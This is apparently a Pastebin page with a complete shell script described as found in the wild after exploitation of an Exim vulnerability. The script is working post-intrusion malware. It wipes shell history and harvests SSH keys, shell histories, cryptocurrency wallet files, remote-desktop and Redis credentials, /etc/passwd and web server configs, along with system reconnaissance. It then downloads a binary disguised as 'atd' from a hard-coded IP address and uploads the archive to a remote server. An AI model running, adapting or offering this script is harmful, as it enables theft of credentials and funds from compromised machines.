Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/bin/sh
- # found in the wild
- # exim exploit 2019-10149
- export PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin:/usr/local/sbin
- export LC_ALL=C
- export HISTFILE=/dev/null
- export HISTSIZE=0
- HOME=/root
- unset DISPLAY
- export UPLOAD_URL=https://85.25.84.99/up.php
- NOLS=0
- NOETC=0
- NODUP=1
- V=2
- UF=temp3754r97y$V
- if [ $NODUP -eq 1 ]; then
- test -f /var/tmp/$UF -o -f /tmp/$UF -o -f /dev/shm/$UF && exit 100
- fi
- BASE=''
- touch /var/tmp/$UF && BASE=/var/tmp
- test -z "$BASE" && touch /tmp/$UF && BASE=/tmp
- test -z "$BASE" && touch /dev/shm/$UF && BASE=/dev/shm
- test -z "$BASE" && exit 90
- cd $BASE && mkdir r && cd r
- export PATH=$BASE:$PATH
- snd () { sh -c "UPLOAD_FILE=\"$1\" UPLOAD_NAME=\"$(hostname).tbz2\" UPLOAD_URL=$UPLOAD_URL atd &"; }
- # ok, real work starts here
- main_dir=$BASE/r
- mkdir $main_dir/root/
- COPY_STUFF=".ssh/ .bashrc .zshrc .*history .histfile .profile .dbshell"
- cd $HOME && cp -a $COPY_STUFF $main_dir/root/ 2>/dev/null
- cd $HOME && tar cf $main_dir/root/root.tar \
- .*coin/w*dat .*Coin/w*dat .dash*/w*dat .dash*/*.conf .*coin/*.conf .*Coin/*.conf *address.txt \
- *coin/w*dat *Coin/w*dat .vnc* .redis* .rdesk* .remmina \
- /home/*/.*coin/w*dat /home/*/.dash*/w*dat /home/*/.dash*/*conf /home/*/.*Coin/w*dat /home/*/.*coin/*.conf /home/*/.*Coin/*.conf \
- /home/*/.ssh /home/*/.remmina /home/*/.vnc* /home/*/.redis* /home/*/.rdesk* /home/*/.remmina \
- /home/*/.bash* /home/*/.zsh* /home/*/.*hist* /home/*/.profile /home/*/.dbshell 2>/dev/null
- cd $main_dir/root/
- ssh -V > ssh.version 2>/dev/null
- if [ $NOLS -eq 0 ]; then
- ls -la /home/ > homes 2>/dev/null
- ls -la /home/*/ >> homes 2>/dev/null
- la -laR /root > rootls 2>/dev/null
- fi
- mkdir $main_dir/root/sysinfo 2>/dev/null
- cd $main_dir/root/sysinfo 2>/dev/null
- # EXIM
- tail -n 100 /etc/*release /etc/version > system.version 2>/dev/null
- ip addr > ip 2>/dev/null
- iptables-save > iptables 2>/dev/null
- ip6tables-save > ip6tables 2>/dev/null
- # /EXIM end exim
- hostname > hostname
- uname -a > uname
- echo `date -u` '('`$(which date)`')' > date
- uptime > uptime
- w > w
- id > id
- ps auxwwwwwTH > ps
- ps auxwwwwwf > ps-forest
- ps auxwwwwwfe > ps-env
- cat /proc/meminfo > meminfo 2>/dev/null
- cat /proc/cpuinfo > cpuinfo 2>/dev/null
- ifconfig -a > ifconfig 2>/dev/null
- df > df 2>/dev/null
- dmesg > dmesg 2>/dev/null
- mount > mount 2>/dev/null
- env > env 2>/dev/null
- lspci -k > lspci 2>/dev/null
- lsusb > lsusb 2>/dev/null
- netstat -antpuxwenW > netstat 2>/dev/null
- route -en > route 2>/dev/null
- # other kernel info
- cat /proc/modules > lsmod 2>/dev/null
- cp /proc/version /proc/cmdline /proc/filesystems . 2>/dev/null
- lscpu > lscpu 2>/dev/null
- # copy stuff from /etc?
- if [ $NOETC -eq 0 ]; then
- mkdir $main_dir/root/sysinfo/etc
- cd $main_dir/root/sysinfo/etc
- cp -pRL /etc/*release /etc/cron* /etc/*version /etc/issue* /etc/hosts* /etc/motd /etc/passwd /etc/apache2 /etc/httpd /etc/nginx /etc/resolv* /etc/wpa* . 2>/dev/null
- cd -
- fi
- cd $main_dir/root
- # list some dirs
- if [ $NOLS -eq 0 ]; then
- ls -laR /boot > ls-boot 2>&1
- ls -laR /etc > ls-etc 2>&1
- fi
- # compress n clean up
- cd $main_dir
- tar -cj --exclude 'root/sysinfo/etc/httpd/modules*' --exclude 'root/sysinfo/etc/httpd/lib*' --exclude 'root/sysinfo/etc/httpd/man*' -f $BASE/rf root
- # drop source files
- rm -rf $main_dir &
- # ready to send!
- cd $BASE
- wget -q http://173.212.214.137/se -O atd || wget -q http://173.212.214.137/icantgetit -O /dev/null
- test `stat -c %s atd` -eq 610932 && chmod +x atd && snd rf
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement